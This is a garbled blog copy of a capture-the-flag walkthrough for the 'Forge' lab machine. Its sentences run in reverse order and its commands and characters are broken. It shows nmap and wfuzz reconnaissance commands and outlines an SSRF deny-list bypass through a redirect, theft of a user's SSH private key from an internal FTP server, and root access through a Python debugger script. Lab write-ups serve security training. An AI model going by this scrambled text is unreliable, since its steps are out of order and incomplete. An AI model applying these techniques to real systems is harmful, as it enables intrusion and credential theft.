![]() ![]() I’ll add both the domain and the subdomain to /etc/hosts. ![]() The number of characters changes based on the length of the subdomain, but the number of words does not, so I’ll use -hw wfuzz -u -H "Host: " -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -hw 26 I’ll start it with no filtering to get a feel for the default case. The -H "Host: " option will try with different host headers and I can look for any that don’t match the default case. Given the use of the domain name, I’ll start a brute force run for subdomains using wfuzz. ![]() Nmap also notes that the site returns a redirect to. This is likely a firewall, and that means that FTP is likely running behind it. Nmap done: 1 IP address (1 host up) scanned in 10.20 secondsīased on the OpenSSH and Apache versions, the host is likely running Ubuntu 20.04 Focal. ![]() Service Info: Host: 10.10.11.111 OS: Linux CPE: cpe:/o:linux:linux_kernel |_http-title: Did not follow redirect to |_http-server-header: Apache/2.4.41 (Ubuntu) Nmap done: 1 IP address (1 host up) scanned in 92.16 nmap -p 22,80 -sCV -oA scans/nmap-tcpscripts 10.10.11.111Ģ2/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux protocol 2.0) Nmap scan report for stacked.htb (10.10.11.111) Warning: 10.10.11.111 giving up on port because retransmission cap hit (10). Nmap found two open TCP ports, SSH (22) and HTTP nmap -p-min-rate 10000 -oA scans/nmap-alltcp 10.10.11.111 In Beyond Root, I’ll look at bypassing the filter, and explore the webserver configuration to figure out how the webserver talks FTP. The user is able to run a Python script as root, and because of how this script uses PDB (the Python debugger), I can exploit the crash to get a shell as root. I’ll update my redirect to have it fetch files from the local FTP server, including the user flag and the user’s SSH private key. From the admin site, I can see that it too has an SSRF, and it can manage FTP as well. I’ll have the server contact me, and return a redirect to the site I actually want to have it visit. But to do that, I have to bypass a deny list of terms in the given URL. The website on Forge has an server-side request forgery (SSRF) vulnerability that I can use to access the admin site, available only from localhost. ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. Archives
January 2023
Categories |